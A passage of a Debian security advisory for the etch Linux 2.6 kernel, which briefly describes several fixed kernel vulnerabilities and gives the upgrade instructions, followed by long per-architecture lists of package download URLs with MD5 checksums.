the\n available entropy. zero-entropy systems were seeded with the same\n inputs at boot time, resulting in repeatable series of random numbers.\n\nCVE-2007-2525\n\n Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused\n by releasing a socket before PPPIOCGCHAN is called upon it. This could\n be used by a local user to DoS a system by consuming all available memory.\n\nCVE-2007-2876\n\n Vilmos Nebehaj discovered a NULL pointer dereference condition in the\n netfilter subsystem. This allows remote systems which communicate using\n the SCTP protocol to crash a system by creating a connection with an\n unknown chunk type.\n\nCVE-2007-3513\n\n Oliver Neukum reported an issue in the usblcd driver which, by not\n limiting the size of write buffers, permits local users with write access\n to trigger a DoS by consuming all available memory.\n\nCVE-2007-3642\n\n Zhongling Wen reported an issue in nf_conntrack_h323 where the lack of\n range checking may lead to NULL pointer dereferences. Remote attackers\n could exploit this to create a DoS condition (system crash).\n\nCVE-2007-3848\n\n Wojciech Purczynski discovered that pdeath_signal was not being reset\n properly under certain conditions which may allow local users to gain\n privileges by sending arbitrary signals to suid binaries.\n\nCVE-2007-3851\n \n Dave Airlie reported that Intel 965 and above chipsets have relocated\n their batch buffer security bits. Local X server users may exploit this\n to write user data to arbitrary physical memory addresses.\n\nThese problems have been fixed in the stable distribution in version \n2.6.18.dfsg.1-13etch1.\n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n Debian 4.0 (etch)\n fai-kernels 1.17+etch4\n user-mode-linux 2.6.18-1um-2etch3\n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. If you have built a custom kernel from the kernel source\npackage, you will need to rebuild to take advantage of these fixes.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.dsc\n Size/MD5 checksum: 5672 ef2648e54c6ea1769b29ba191fc13083\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-13etch1.diff.gz\n Size/MD5 checksum: 5306139 589297d453d15848b5879cf22eed7d40\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n Size/MD5 checksum: 3585938 a94cd1247d3dc98378dd094b3b364044\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n Size/MD5 checksum: 1081908 36d119bd92dbd35a8f83b191f74daf09\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n Size/MD5 checksum: 1475708 0373ab2ac016f31d2591eab4de39e4d3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n Size/MD5 checksum: 41417232 279c0d7b44a451169a118e0a2b0c4eeb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-5_2.6.18.dfsg.1-13etch1_all.deb\n Size/MD5 checksum: 3738202 e4cfce3e67d3a0f6aeb4fe1fb5706372\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-13etch1_all.deb\n Size/MD5 checksum: 51094 b22167a8b2ab8d0cfb9eded0d0b8d8a0\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 3024210 ad1fc21ac8fcb76a0db86d25737c8a83\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 50680 28ad3748b8d76abbb2e896f7ff190240\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 50720 1f106b97c91e07921402b0a2174574c6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 263524 4ce1e83ad733aee9d36b075babc6f908\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 263838 4c9ebe648f73818252ed3de79567219e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 262864 a3d6389b9224fcef726128f3a747a4f8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 3048212 d86c3c8fac6533904b91592016e2afba\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 264300 15606dadab1e1bbb4d9234a8bfb09b5e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-generic_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 23485186 1978fddd39e8e7ce9ebc88efefd4ebe0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-legacy_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 23464818 bdfd39761fd0bc68de001efb430895af\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-alpha-smp_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 23838852 e9ae2b4f056d9b47832234d2aa6ec4d7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-alpha_2.6.18.dfsg.1-13etch1_alpha.deb\n Size/MD5 checksum: 23528772 4f029181ad02c46f2ae2b34038b629e0\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 3164562 5bef24546e02e53d0b866b68e57c8294\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 50644 173c9d06298afe48e609cd08a5420737\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 50668 61e625ce94855d474c0562819ae3b879\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 270036 cd6f518453e0b75e3d4e17bc1fca62a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 3187796 2958630378a24cb3f16807e04fe17297\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 269650 dbfd4c56547401e7b6a6460f41dd266b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 3330944 996a5cba350ae0c9110f8ca72492bfc2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 271784 c1841e07342a73c9cf87058cc0ca943b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 3353796 730dd7dd17cb532152463000f16459f0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 270068 363ff82948e473032eaa4fc37d2b9d6b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 16838550 dee2a96f0c89bc9b59b2febd42dc8bb1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 1647400 8f72b372c132b40f5c828d7d0a94bf62\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 1679728 853224dc22a8fa38c8b4af6534886a77\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 15238676 d62ddc5e61a35e84529262c9101b0e93\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 15256142 8b0667dd7cb043b753ce3a9770058515\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 50618 0da191c5dcd2406d079f9aab3b4ca0a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-amd64_2.6.18.dfsg.1-13etch1_amd64.deb\n Size/MD5 checksum: 50632 46cd39c06556d9bc465099cddb3c7f3d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 3346806 bc6581484d2364ccba4bbdb275072ecb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 50652 976339e33b567d816811d561dc575cc8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-arm_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 50694 19473ef72c0109f1ce9dc9dfd4f3de3d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 225038 969f487c6c9d50fef7200e0a3ecb5c4b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 226564 c5f03ec763dfb6b27d00f8f90e0ae9da\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 232748 bb9606e416b2aa84c3cc8071ac2350d8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 192126 cd01397be860265e013d55aa574c7347\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 194764 e05a0715a2bf9cbac171217b22314b19\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-footbridge_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 7518754 018e9a847ff04f7fc3580f85bfc2abe1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-iop32x_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 7869416 e4750e15d602443f08ba02c7e7c2a137\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-ixp4xx_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 8806748 7436ed2118660e9c7f4f4697ac5868c3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-rpc_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 4558510 68d071f5a09c182509bea873aef02105\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s3c2410_2.6.18.dfsg.1-13etch1_arm.deb\n Size/MD5 checksum: 4981066 6c261104c98cc528d6633f79274ad72a\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 2964238 f6fd8c5dd6071370f953e496756851cf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 50642 8aca6d6bffa3b334b71b66332dd125ae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-hppa_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 50668 7dfc3cbdd0f0763008e0246015fe5c9f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 188488 31502e1f9bdcc0a24d6a7762f6f4cbe8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 189420 e6deaa2c4a398b59a40a732cb9018940\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 189146 133d151b9aa064b61c90c0c9ce20656c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 189834 c7ada740b1647894ceda503d4ee8399b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 10498710 5d3ee84cc71a57eabe1d0647f704ad3c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 10940810 8e1de20ffcc7df26862544af83f78771\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 11344516 a6fe777a6d6296c1d95c81c25931102e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-parisc64-smp_2.6.18.dfsg.1-13etch1_hppa.deb\n Size/MD5 checksum: 11751450 e0c73577059ad7ee24893278e8bb580c\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 3164474 5581e6b60de382087f4e3cd05a326cd8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 277248 ff8b78d10cb79fc1c9258cd43a408499\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 275932 874d04ecd1f692d9781e2cb47c687ee6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 276286 dbcc90161edc6a46b7a89a10b0fc22ff\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 50640 34b3065eb0fdc3a02576c9ebdd2508d9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-i386_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 50700 77d1ae15ad63b7e9675225a6ca7db47c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 268294 a60191beaaf0d62099dbd1a20eaf6b75\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 275830 f9a83308d8ecd6eb36d6791b864116c5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 3050892 8283afde8651de38ff35c68ac9d34feb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 273688 759941012b1848db94e34d6f1c57cfd6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 273764 bc27c920b5a85c643d3f9a7fa3bb2f9f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 3145220 f0cee6bc58f389ef78fc3cbcad757197\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 270550 b1aca209d3f63334b8512bd70e7fee04\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 3167356 72a44aac33deb66d1eed41b37d9f6f84\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 271130 cebd78501825a595f992a575371cd8b7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-486_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16170152 7dbf8514bc38e86a6d6454593628a9a8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16319248 a099f9f04a33385dc29a7cc5ed743411\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-686-bigmem_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16384438 83d05912745de976a2648295241f0b15\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-amd64_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16816198 1c14cd0e4867b12f05bea602a7940b11\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-k7_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16449650 9c195ec1b9f2b5f2531017389234d817\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16358054 727d0f2e6e821a34c527c44946660653\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-k7_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 16488812 1619800305c3c55e48f9b5484cd7ec39\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 1296346 6f233c2b69738b9d577a4c1d7d9283a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 1323270 c3ba3e1299340fe9666746ada15cafe2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 14258314 37215c1b602209320153136ddae5b53d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 14272088 00cfea4d19109eff959c360f63b90c18\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 50620 3d60ebbd894ac77ddaafaaba903083b8\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n Size/MD5 checksum: 50636 9277c97ebb5c14fc93c5449c5e5a391c\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 3078390 7c1dc7cf08fdce40fdb01acd14c6167b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 50644 4303c1255e6d4840b9ce34b8da158125\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-ia64_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 50662 5235fb30a8f35c91ea15335ee439a60d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 251576 5b89eeb214501b0a1b6e2d2712763fe3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 251558 573aa9cc9fba9924a98a1b6ca786edfe\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 28008514 baaf3f87d60cb1d68c361cea849d3c27\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb\n Size/MD5 checksum: 28178022 c6cb8de82903383b78c7a9646d7df7da\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 3346354 c0c5d438a80a114ffbe515104f44785f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 50644 822db9efc5caba5bd3f96c2ffef90ce8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mips_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 50692 9fbd9cb53ce75b25243adfb5568bd2f9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 146348 4a2ede92f7cba5e409a01504a5787786\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 156600 b56c8fe624757cca08eafda9a7b62122\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 160930 14710075883c5cb17ed1f4dfa854461f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 179380 f61160dd2e459a70170e5ba8524aea36\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 179154 aba921bcc75c80c0c96c727eac34afaf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 6090314 99e9641ce38b6d0530199ad566738d73\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 8271518 6979492cd1b01cf3b76958211bfb3bdf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 9037182 56824fbbc825d14d2fec62b2562f44ce\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 15636546 85bc62cca019e5d5c07374fe4ea05df8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb\n Size/MD5 checksum: 15608670 233369e78b74fdca2143c971995440f5\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 3346628 a208480b2fa7bdd13559b4078d03cac9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 50648 20d1bf2c345a889720562597f9300152\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mipsel_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 50712 31666ed837cac8aec136528616a7407f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 146012 ec774ccba8d1783239b0f12cee90abe3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 152252 99657c9b655c5f1bded07e4a5394d132\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 152340 0c0778fa59bda664f8cb4f0f1ba8f90b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 174444 8927ed0b8d880d99fcc79c64ecc44c54\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 179284 8b01ba01c4d2e0e4a1dbfd4acd5354ea\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 179144 368da689abd47ca70aced24efec5b040\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 6025698 a355ec38f440f7e08d0f22ce6184bcf8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 5937952 2de36f1fdeb55373eb50fb77efe7f938\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 5921402 006d6d3d34f2db5b21500cdc8914dc08\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 9857018 4246c3b15aae0df84b669381a8f1383e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 15052960 317130eff4221493bf31349bb99d0eab\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb\n Size/MD5 checksum: 15019204 a5c6e183ff53d3c8fd169f0d2bc17ebc\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_powerpc.deb\n Size/MD5 checksum: 3388916 6d6415c4241ea26786fd3a72899e266f\n 